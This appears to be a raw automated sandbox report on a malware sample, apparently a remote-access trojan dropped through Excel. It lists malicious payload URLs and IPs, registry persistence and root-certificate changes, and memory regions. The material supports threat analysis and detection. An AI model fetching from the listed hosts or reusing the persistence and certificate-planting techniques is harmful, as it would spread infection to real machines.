unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQ
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP
unknown
https://www.google.com/accounts/servicelogin
unknown
http://192.3.220.22/430/dllhost.exep
unknown
https://secure.comodo.com/CPS0
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaF
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.ebuddy.com
unknown
There are 42 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
og1.in
104.21.78.54
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
192.3.220.22
unknown
United States
malicious
107.173.4.16
unknown
United States
malicious
104.21.78.54
og1.in
United States
178.237.33.50
geoplugin.net
Netherlands
172.67.216.244
unknown
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-DSGECX
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-DSGECX
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-DSGECX
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
ew0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28BCB
28BCB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
8~0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\324FE
324FE
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\327FA
327FA
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3335F
3335F
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\327FA
327FA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Hayweed88\Uninstall\Cakiest237\heelers
Armgangen
HKEY_CURRENT_USER\brdbakken\Equableness66\Skvalderen137
inoperculate
HKEY_CURRENT_USER\seers\Uninstall\saleably
zaffers
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Roscoelite
Aftvttedes
HKEY_CURRENT_USER\Environment
Misbehavers
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Chivey57
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 77 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6AA4000
heap
page read and write
malicious
9B56000
direct allocation
page execute and read and write
malicious
9888000
direct allocation
page execute and read and write
malicious
9C8000
heap
page read and write
46F000
unkown
page readonly
6F0000
heap
page read and write
A0DA000
direct allocation
page execute and read and write
1F56000
heap
page read and write
478000
heap
page read and write
350000
heap
page read and write
1A986000
heap
page read and write
7FE89790000
trusted library allocation
page execute and read and write
1ABC5000
heap
page read and write
A025000
direct allocation
page execute and read and write
57F1000
heap
page read and write
3FF000
stack
page read and write
12666000
trusted library allocation
page read and write
4FD4000
heap
page read and write
2116000
heap
page read and write
4D3000
direct allocation
page read and write
4741000
heap
page read and write
568B000
heap
page read and write
550000
heap
page read and write
4877000
heap
page read and write
229F000
stack
page read and write
5F00000
heap
page read and write
54F1000
heap
page read and write
1D10000
direct allocation
page read and write
46F000
unkown
page readonly
2491000
trusted library allocation
page read and write
4A0000
direct allocation
page read and write
35D000
heap
page read and write
401000
unkown
page execute read
2800000
trusted library allocation
page read and write
B7000
stack
page read and write
61CF000
heap
page read and write
A07D000
direct allocation
page execute and read and write
634F000
stack
page read and write
4A3000
unkown
page readonly
167000
stack
page read and write
A094000
direct allocation
page execute and read and write
4790000
heap
page read and write
5654000
heap
page read and write
7FE89860000
trusted library allocation
page read and write
5D6E000
stack
page read and write
63B6000
heap
page read and write
5685000
heap
page read and write
4BF000
heap
page read and write
1C5000
trusted library allocation
page execute and read and write
614D000
heap
page read and write
20F0000
heap
page read and write
53F000
heap
page read and write
2300000
trusted library allocation
page read and write
394000
heap
page read and write
10000
heap
page read and write
61F2000
heap
page read and write
2B71000
trusted library allocation
page read and write
49A000
heap
page read and write
4794000
heap
page read and write
6EC000
heap
page read and write
541E000
stack
page read and write
307000
heap
page read and write
EF0000
direct allocation
page read and write
56C0000
heap
page read and write
570000
heap
page read and write
3414000
heap
page read and write
1B820000
heap
page read and write
47D000
heap
page read and write
9B09000
direct allocation
page execute and read and write
400000
unkown
page readonly
3E7E000
heap
page read and write
3EE0000
heap
page read and write
45C000
unkown
page readonly
55B3000
heap
page read and write
400000
unkown
page readonly
56B7000
heap
page read and write
D10000
trusted library allocation
page read and write
A04E000
direct allocation
page execute and read and write
CF0000
trusted library allocation
page read and write
5A5000
heap
page read and write
375000
heap
page read and write
2370000
heap
page read and write
4B6E000
stack
page read and write
400000
system
page execute and read and write
983000
trusted library allocation
page read and write
4707000
heap
page read and write
373000
heap
page read and write
B10000
trusted library allocation
page read and write
21E3000
heap
page read and write
A058000
direct allocation
page execute and read and write
5C59000
heap
page read and write
3E7C000
heap
page read and write
2A03000
trusted library allocation
page read and write
6688000
direct allocation
page execute and read and write
1D0000
trusted library allocation
page read and write
56B0000
heap
page read and write
2B0000
direct allocation
page read and write
DF0000
direct allocation
page read and write
6F3000
heap
page read and write
40A000
unkown
page write copy
5C71000
heap
page read and write
230000
heap
page read and write
4858000
heap
page read and write
5830000
heap
page read and write
408000
unkown
page readonly
980000
trusted library allocation
page read and write
10000
heap
page read and write
DD0000
heap
page read and write
2240000
heap
page read and write
A09B000
direct allocation
page execute and read and write
46BF000
heap
page read and write
1ABD9000
heap
page read and write
3780000
trusted library allocation
page read and write
1E10000
heap
page read and write
6E5000
heap
page read and write
46FD000
heap
page read and write
56B000
heap
page read and write
56B5000
heap
page read and write
47AE000
stack
page read and write
5FBC000
heap
page read and write
A0BD000
direct allocation
page execute and read and write
1C31D000
heap
page read and write
36E000
heap
page read and write
35E000
heap
page read and write
586C000
heap
page read and write
408000
unkown
page readonly
46B2000
heap
page read and write
8D000
stack
page read and write
3371000
heap
page read and write
E90000
trusted library allocation
page read and write
3DC2000
heap
page read and write
4F70000
heap
page read and write
1F14000
heap
page read and write
7FE89910000
trusted library allocation
page read and write
49B000
heap
page read and write
1AA6C000
heap
page read and write
1BF6000
heap
page read and write
7FE89686000
trusted library allocation
page read and write
514000
heap
page read and write
510000
heap
page read and write
41F000
system
page execute and read and write
4F20000
heap
page read and write
557000
heap
page read and write
50E000
heap
page read and write
28B0000
trusted library allocation
page read and write
7FE899F0000
trusted library allocation
page read and write
1C5C000
heap
page read and write
A054000
direct allocation
page execute and read and write
56A2000
heap
page read and write
18B000
stack
page read and write
3905000
trusted library allocation
page read and write
373000
heap
page read and write
54AC000
stack
page read and write
6FD000
heap
page read and write
4B9000
heap
page read and write
4A80000
heap
page read and write
1DB0000
heap
page read and write
579000
heap
page read and write
267000
heap
page read and write
3417000
heap
page read and write
25E0000
trusted library allocation
page read and write
2173000
heap
page read and write
33DD000
heap
page read and write
5BE3000
heap
page read and write
4FED000
heap
page read and write
FCE000
stack
page read and write
48F9000
heap
page read and write
593000
heap
page read and write
2710000
trusted library allocation
page read and write
7FFFFF82000
trusted library allocation
page readonly
56EC000
heap
page read and write
506000
heap
page read and write
7FE897B2000
trusted library allocation
page read and write
5F68000
stack
page read and write
400000
unkown
page readonly
E28000
trusted library allocation
page read and write
594000
heap
page read and write
28E0000
remote allocation
page read and write
43E000
stack
page read and write
574000
heap
page read and write
1E62000
heap
page read and write
880000
heap
page read and write
22E7000
heap
page read and write
489E000
stack
page read and write
A08A000
direct allocation
page execute and read and write
4B10000
trusted library allocation
page read and write
1CAD000
heap
page read and write
6E9000
heap
page read and write
484000
heap
page read and write
56C5000
heap
page read and write
606D000
heap
page read and write
25C000
heap
page read and write
39D000
heap
page read and write
48FB000
heap
page read and write
3404000
heap
page read and write
56B5000
heap
page read and write
395000
heap
page read and write
3E3D000
heap
page read and write
3A24000
heap
page read and write
451000
heap
page read and write
45C000
unkown
page readonly
55B5000
heap
page read and write
880000
direct allocation
page read and write
12511000
trusted library allocation
page read and write
3E2A000
heap
page read and write
1B16E000
stack
page read and write
5B4A000
heap
page read and write
2E6000
heap
page execute and read and write
57D000
heap
page read and write
57F0000
heap
page read and write
2590000
trusted library allocation
page read and write
57A000
heap
page read and write
55E000
heap
page read and write
7FE898D0000
trusted library allocation
page read and write
341E000
heap
page read and write
3DC6000
heap
page read and write
803000
trusted library allocation
page execute and read and write
34F0000
trusted library allocation
page read and write
3479000
trusted library allocation
page read and write
2113000
heap
page read and write
35E000
stack
page read and write
9C0000
trusted library allocation
page read and write
232F000
stack
page read and write
3F0000
direct allocation
page read and write
5B6D000
heap
page read and write
56B5000
heap
page read and write
401000
unkown
page execute read
47B000
heap
page read and write
4C3000
heap
page read and write
57F1000
heap
page read and write
574000
heap
page read and write
60D7000
heap
page read and write
63B000
heap
page read and write
520E000
stack
page read and write
1A70E000
heap
page execute and read and write
36B000
heap
page read and write
21D6000
heap
page read and write
408000
unkown
page readonly
10000
heap
page read and write
5D22000
heap
page read and write
7FE89900000
trusted library allocation
page read and write
364000
heap
page read and write
2B1F000
stack
page read and write
2B8E000
trusted library allocation
page read and write
328E000
trusted library allocation
page read and write
173000
trusted library allocation
page read and write
7FE897D4000
trusted library allocation
page read and write
35D000
heap
page read and write
37B000
heap
page read and write
3E23000
heap
page read and write
1CBD000
heap
page read and write
391000
heap
page read and write
10000
heap
page read and write
10000
heap
page read and write
2CE000
stack
page read and write
1DC9000
heap
page read and write
5BF000
heap
page read and write
4888000
heap
page read and write
7FE8B1E6000
trusted library allocation
page read and write
3B9000
heap
page read and write
1B670000
heap
page read and write
20000
heap
page read and write
4A7C000
heap
page read and write
4EDB000
stack
page read and write
2118000
heap
page read and write
57F1000
heap
page read and write
40E000
heap
page read and write
7FE897D0000
trusted library allocation
page read and write
66C000
heap
page read and write
2166000
heap
page read and write
4FD000
heap
page read and write
400000
heap
page read and write
1C250000
heap
page read and write
9C0000
heap
page read and write
7FE8962C000
trusted library allocation
page execute and read and write
60CE000
stack
page read and write | page guard
6194000
heap
page read and write
5AF7000
heap
page read and write
8D000
stack
page read and write
5C07000
heap
page read and write
2519000
trusted library allocation
page read and write
37A000
heap
page read and write
5B32000
heap
page read and write
4859000
heap
page read and write
408000
unkown
page readonly
30F000
stack
page read and write
21E4000
heap
page read and write
36E000
stack
page read and write
569D000
heap
page read and write
3EE000
heap
page read and write
45C000
unkown
page readonly
2368000
heap
page read and write
3DC2000
heap
page read and write
6F5000
heap
page read and write
A05A000
direct allocation
page execute and read and write
3E48000
heap
page read and write
44B000
heap
page read and write
20000
heap
page read and write
17F000
trusted library allocation
page read and write
4A3000
unkown
page readonly
578000
heap
page read and write
561A000
heap
page read and write
3C70000
trusted library allocation
page read and write
7FFFFF80000
trusted library allocation
page readonly
5CA0000
heap
page read and write
2D7000
heap
page read and write
4BC000
heap
page read and write
1F10000
heap
page read and write
46F000
unkown
page readonly
5548000
heap
page read and write
A122000
direct allocation
page execute and read and write
3B3B000
stack
page read and write
579000
heap
page read and write
3AAD000
trusted library allocation
page read and write
45C000
unkown
page readonly
27C0000
heap
page read and write
970000
heap
page read and write
10000
heap
page read and write
7FFFFF82000
trusted library allocation
page readonly
3C7000
heap
page read and write
3969000
trusted library allocation
page read and write
3CE000
heap
page read and write
2D7000
trusted library allocation
page read and write
1E50000
direct allocation
page read and write
43A000
heap
page read and write
7FE8994D000
trusted library allocation
page read and write
671000
heap
page read and write
7FE8B190000
trusted library allocation
page read and write
3F9000
heap
page read and write
88C000
heap
page read and write
300000
trusted library allocation
page read and write
575000
heap
page read and write
6DD000
heap
page read and write
7FE89913000
trusted library allocation
page read and write
436000
heap
page read and write
4DAD000
heap
page read and write
46F000
unkown
page readonly
35A0000
trusted library allocation
page read and write
240000
direct allocation
page read and write
56A1000
heap
page read and write
8D0000
trusted library allocation
page read and write
6BC000
heap
page read and write
1AE69000
stack
page read and write
3CD0000
trusted library allocation
page read and write
590000
heap
page read and write
4A00000
trusted library allocation
page read and write
579000
heap
page read and write
222000
stack
page read and write
4A3000
unkown
page readonly
45D000
system
page execute and read and write
58B6000
heap
page read and write
3E0000
heap
page read and write
3A8000
stack
page read and write
478C000
heap
page read and write
33F1000
heap
page read and write
4A3000
unkown
page readonly
9FF5000
direct allocation
page execute and read and write
24E0000
trusted library allocation
page execute read
20000
heap
page read and write
682000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
3412000
heap
page read and write
4A5E000
stack
page read and write
410000
direct allocation
page read and write
7FE8AE90000
trusted library allocation
page read and write
5CE000
heap
page read and write
5656000
heap
page read and write
1C7EC000
stack
page read and write
4F02000
heap
page read and write
220000
heap
page read and write
4742000
heap
page read and write
459000
system
page execute and read and write
33F6000
heap
page read and write
3356000
heap
page read and write
3E3B000
heap
page read and write
341B000
heap
page read and write
379000
heap
page read and write
2179000
heap
page read and write
375000
heap
page read and write
56AD000
heap
page read and write
18E000
stack
page read and write
4FCC000
heap
page read and write
21CC1000
heap
page read and write
A0C1000
direct allocation
page execute and read and write
EA0000
trusted library allocation
page execute and read and write
2451000
trusted library allocation
page read and write
960000
heap
page read and write
7FE8AF26000
trusted library allocation
page read and write
48D2000
heap
page read and write
45C000
unkown
page readonly
580000
heap
page read and write
897000
heap
page read and write
456000
system
page execute and read and write
56C0000
heap
page read and write
60D0000
heap
page read and write
6135000
heap
page read and write
56BD000
heap
page read and write
10000
heap
page read and write
4C10000
trusted library allocation
page read and write
20000
heap
page read and write
597000
heap
page read and write
E10000
trusted library allocation
page read and write
40A000
unkown
page write copy
2700000
heap
page read and write
3412000
heap
page read and write
4A0000
heap
page read and write
4742000
heap
page read and write
375000
heap
page read and write
469A000
heap
page read and write
442000
heap
page read and write
23E000
stack
page read and write | page guard
46F000
unkown
page readonly
2166000
heap
page read and write
459000
system
page execute and read and write
9FF7000
direct allocation
page execute and read and write
41B000
system
page execute and read and write
400000
unkown
page readonly
1C49E000
heap
page read and write
E00000
trusted library allocation
page read and write
56B000
heap
page read and write
A10E000
direct allocation
page execute and read and write
4278000
remote allocation
page execute and read and write
53E0000
heap
page read and write
130000
trusted library allocation
page read and write
3403000
heap
page read and write
6E8000
heap
page read and write
4C0000
trusted library allocation
page read and write
21B3000
heap
page read and write
7FE8B02C000
trusted library allocation
page read and write
2F5000
heap
page read and write
9FE7000
direct allocation
page execute and read and write
46F000
unkown
page readonly
3E23000
heap
page read and write
270000
direct allocation
page read and write
3412000
heap
page read and write
28C000
heap
page read and write
35E0000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
221FF000
stack
page read and write
40A000
unkown
page write copy
7FE89968000
trusted library allocation
page read and write
1E40000
heap
page read and write
574000
heap
page read and write
56EC000
heap
page read and write
ED0000
trusted library allocation
page read and write
456000
system
page execute and read and write
22E6000
heap
page read and write
46FD000
heap
page read and write
7FE897F0000
trusted library allocation
page read and write
7FE895E3000
trusted library allocation
page read and write
3E6E000
heap
page read and write
494000
heap
page read and write
A050000
direct allocation
page execute and read and write
44E000
heap
page read and write
6F1000
heap
page read and write
2240000
heap
page read and write
443000
heap
page read and write
6178000
stack
page read and write
4DCF000
stack
page read and write
2700000
trusted library allocation
page read and write
541000
heap
page read and write
47B000
heap
page read and write
1C8E0000
heap
page read and write
379000
heap
page read and write
20000
heap
page read and write
21D6000
heap
page read and write
6374000
heap
page read and write
36D000
heap
page read and write
2B0000
trusted library allocation
page read and write
1BFCF000
stack
page read and write
1D64000
heap
page read and write
33FF000
heap
page read and write
810000
direct allocation
page read and write
3A10000
trusted library allocation
page read and write
A02D000
direct allocation
page execute and read and write
3E5A000
heap
page read and write
2FD000
heap
page read and write
16C000
stack
page read and write
2AC000
stack
page read and write
3E73000
heap
page read and write
593000
heap
page read and write
5FF7000
heap
page read and write
68B000
heap
page read and write
EB0000
direct allocation
page read and write
EC0000
trusted library allocation
page read and write
2D42000
trusted library allocation
page read and write
42F000
unkown
page read and write
482F000
heap
page read and write
61F0000
heap
page read and write
1C40000
heap
page read and write
593000
heap
page read and write
6112000
heap
page read and write
10000
heap
page read and write
1C9D000
heap
page read and write
169000
heap
page read and write
2D33000
trusted library allocation
page read and write
B80000
heap
page read and write
297A000
trusted library allocation
page read and write
120000
trusted library section
page read and write
40A000
unkown
page write copy
F5F000
stack
page read and write
56A1000
heap
page read and write
498B000
stack
page read and write
7FE895D3000
trusted library allocation
page execute and read and write
36D000
heap
page read and write
569F000
heap
page read and write
40A000
unkown
page write copy
3414000
heap
page read and write
55B5000
heap
page read and write
4861000
heap
page read and write
1A8DB000
stack
page read and write
6BF000
heap
page read and write
3A4000
heap
page read and write
303000
trusted library allocation
page read and write
336000
heap
page read and write
186000
heap
page read and write
6A30000
heap
page read and write
A003000
direct allocation
page execute and read and write
170000
heap
page read and write
283F000
stack
page read and write
61AB000
heap
page read and write
1CA5000
heap
page read and write
86D000
trusted library allocation
page read and write
4708000
heap
page read and write
45C000
unkown
page readonly
81A000
trusted library allocation
page read and write
23B000
stack
page read and write
4F3C000
heap
page read and write
2C28000
trusted library allocation
page read and write
515F000
stack
page read and write
611E000
heap
page read and write
7FE89990000
trusted library allocation
page read and write
5C94000
heap
page read and write
1C0000
trusted library allocation
page read and write
325000
heap
page read and write
3475000
trusted library allocation
page read and write
439000
heap
page read and write
40A000
unkown
page write copy
33F5000
heap
page read and write
E70000
trusted library allocation
page read and write
A11A000
direct allocation
page execute and read and write
465000
heap
page read and write
7FE895DD000
trusted library allocation
page execute and read and write
4A0000
heap
page read and write
5C13000
heap
page read and write
4DE000
heap
page read and write
243F000
stack
page read and write
25DE000
stack
page read and write
4A3000
unkown
page readonly
4D6000
heap
page read and write
557000
heap
page read and write
4F7C000
stack
page read and write
A066000
direct allocation
page execute and read and write
56B7000
heap
page read and write
2940000
trusted library allocation
page read and write
250E000
stack
page read and write
60B3000
heap
page read and write
33F3000
heap
page read and write
3C89000
trusted library allocation
page read and write
237E000
heap
page read and write
4F79000
heap
page read and write
4BAE000
stack
page read and write
21E9000
heap
page read and write
3AB6000
trusted library allocation
page read and write
7FE89783000
trusted library allocation
page read and write
620000
heap
page read and write
7FE8B220000
trusted library allocation
page read and write
46F7000
heap
page read and write
177000
direct allocation
page read and write
10000
heap
page read and write
4CA000
heap
page read and write
2588000
trusted library allocation
page read and write
4850000
trusted library allocation
page read and write
359000
heap
page read and write
1EB0000
heap
page read and write
1E00000
heap
page read and write
2700000
heap
page read and write
9B0000
direct allocation
page read and write
6061000
heap
page read and write
A007000
direct allocation
page execute and read and write
4887000
heap
page read and write
1F70000
heap
page read and write
3284000
trusted library allocation
page read and write
2700000
heap
page read and write
375000
heap
page read and write
3CC000
heap
page read and write
447000
heap
page read and write
56D000
heap
page read and write
3E3B000
heap
page read and write
401000
unkown
page execute read
4B4F000
stack
page read and write
3E69000
heap
page read and write
3275000
trusted library allocation
page read and write
3AD000
heap
page read and write
3E76000
heap
page read and write
309000
heap
page read and write
412000
heap
page read and write
7FE8B1A0000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
6BF000
heap
page read and write
5BB4000
heap
page read and write
579000
heap
page read and write
A085000
direct allocation
page execute and read and write
3ED000
stack
page read and write
4794000
heap
page read and write
55C000
heap
page read and write
5BB0000
trusted library allocation
page read and write
3410000
heap
page read and write
183000
stack
page read and write
4A69000
heap
page read and write
7FE8B040000
trusted library allocation
page execute and read and write
509E000
stack
page read and write | page guard
41F000
system
page execute and read and write
400000
unkown
page readonly
1A808000
stack
page read and write
260000
direct allocation
page read and write
603D000
heap
page read and write
4F04000
heap
page read and write
30B000
heap
page read and write
A0A3000
direct allocation
page execute and read and write
4BD000
heap
page read and write
3E7E000
heap
page read and write
63D9000
heap
page read and write
33D6000
heap
page read and write
1940000
remote allocation
page execute and read and write
7FE8AE72000
trusted library allocation
page read and write
4CA8000
heap
page read and write
7FE8968C000
trusted library allocation
page execute and read and write
319000
heap
page read and write
2948000
trusted library allocation
page read and write
5859000
heap
page read and write
56B7000
heap
page read and write
8D000
stack
page read and write
5B03000
heap
page read and write
18C000
stack
page read and write
337000
heap
page read and write
4F3D000
heap
page read and write
79F000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2E9000
heap
page read and write
1B1BC000
stack
page read and write
48E000
heap
page read and write
414000
heap
page read and write
7FE8AE83000
trusted library allocation
page read and write
46F000
unkown
page readonly
2703000
trusted library allocation
page read and write
4868000
heap
page read and write
6C5000
heap
page read and write
2819000
trusted library allocation
page read and write
56CE000
heap
page read and write
8D000
stack
page read and write
A03A000
direct allocation
page execute and read and write
2500000
trusted library allocation
page read and write
5544000
heap
page read and write
554E000
stack
page read and write
1B2E4000
heap
page read and write
E80000
trusted library allocation
page read and write
37E000
heap
page read and write
D2E000
stack
page read and write
287E000
stack
page read and write
340A000
heap
page read and write
B83000
heap
page read and write
221B000
heap
page read and write
31A000
heap
page read and write
6084000
heap
page read and write
4FA0000
heap
page read and write
1CAFE000
stack
page read and write
554E000
heap
page read and write
3704000
heap
page read and write
3410000
heap
page read and write
7FE8B060000
trusted library allocation
page execute and read and write
3E3C000
heap
page read and write
E44000
heap
page execute and read and write
A04C000
direct allocation
page execute and read and write
593000
heap
page read and write
10000
heap
page read and write
7FE8B200000
trusted library allocation
page read and write
23A0000
heap
page execute and read and write
7FE89890000
trusted library allocation
page read and write
230000
heap
page read and write
1F40000
heap
page read and write
236C000
stack
page read and write
56CF000
heap
page read and write
32E000
heap
page read and write
4852000
heap
page read and write
45E000
heap
page read and write
2F9A000
stack
page read and write
5D9F000
stack
page read and write
5D9E000
stack
page read and write | page guard
33F7000
heap
page read and write
35B000
heap
page read and write
8C3000
trusted library allocation
page read and write
39D000
heap
page read and write
2233E000
stack
page read and write
2A12000
trusted library allocation
page read and write
4C0D000
stack
page read and write
F10000
trusted library allocation
page read and write
12464000
trusted library allocation
page read and write
483000
heap
page read and write
573000
heap
page read and write
48C0000
heap
page read and write
2480000
heap
page read and write
21CD0000
trusted library allocation
page read and write
1A9C3000
heap
page read and write
4661000
heap
page read and write
B8D000
heap
page read and write
6090000
heap
page read and write
5BCC000
heap
page read and write
590000
heap
page read and write
26CF000
trusted library allocation
page read and write
3AB7000
trusted library allocation
page read and write
5C7D000
heap
page read and write
51AA000
heap
page read and write
4852000
heap
page read and write
1CB6000
heap
page read and write
18C000
stack
page read and write
8B0000
trusted library allocation
page execute and read and write
150000
trusted library allocation
page read and write
255E000
trusted library allocation
page read and write
A0B5000
direct allocation
